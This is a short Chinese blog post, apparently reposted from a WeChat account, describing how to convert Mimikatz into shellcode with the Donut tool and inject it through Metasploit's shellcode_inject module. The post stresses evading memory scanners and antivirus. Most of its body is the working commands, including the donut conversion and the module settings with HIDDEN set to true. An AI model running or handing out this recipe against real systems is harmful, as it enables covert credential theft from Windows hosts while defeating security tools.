Donut 是一个与位置无关的工具,支持在内存中执行 VBScript、JScript、EXE、DLL 文件和 dotNET 程序集。Donut 创建的模块可以从 HTTP 服务器暂存,也可以直接嵌入到加载器本身中。可以选择使用 Chaskey 块密码和随机生成的 128 位密钥对模块进行加密。在内存中加载并执行文件后,将擦除原始引用以阻止内存扫描程序。
提取mimikatz.bin
./donut -f mimikatz.exe -o mimikatz.bin
设置MSF
use
post/windows/manage/shellcode_inject
set
SHELLCODE /root/tools/noterce/mimikatz.bin
set
CHANNELIZED
true
set
INTERACTIVE
true
set
HIDDEN
true
https://github.com/TheWover/donut
原文始发于微信公众号(Enginge):MSF加载Minikatz免杀
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论